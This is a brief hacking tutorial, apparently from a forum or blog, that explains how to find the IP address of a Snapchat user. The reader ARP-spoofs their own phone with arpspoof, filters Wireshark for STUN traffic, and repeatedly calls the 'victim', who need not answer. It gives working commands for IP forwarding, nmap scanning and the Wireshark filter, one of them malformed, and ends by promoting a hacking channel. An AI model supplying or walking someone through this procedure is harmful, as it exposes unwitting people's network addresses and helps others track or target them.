Easy MITM attack
Required: – Mac OS X / Kali linux ( or any UNIX )
– A phone where you have snapchat on ( im assuming its a phone )
– Some tools and little MITM knowledge !
Here is the tut:
1. Fire up terminal and ip forward your laptop/pc with this scripts:
Kali – “” sudo sysctl net.ipv4.ip_forward = 1 “”
“” sudo net.ipv4.ip_forward = 1 “”
Mac – “” sudo sysctl -w net.inet.ip.forwarding=1 “”
2. Find your phone device local ip and write it down.
Nmap -sn <gateway ip>/24 ex. nmap -sn (or -sP) 192.168.0.1/24
3. Spoof your phone.
arpspoof -i <interface> -t <phone ip> gateway
ex(mac): arpspoof -i en0 -t 192.168.0.160 192.168.0.1
4. Fire up Wireshark and filter on your phone ip with STUN protocol
ip.addr == <phone ip> && stun
ex. ip.addr == 192.168.0.160 && stun
5. Call your victim on snap and keep calling him for around 5 seconds.
THEY DO NOT NEED NECESSARY TO ANSWER
You will see on wireshark some binding requests, then some other STUN ones.
For More Hacking And Python Tutorials Join This high Quality Hacking Channel: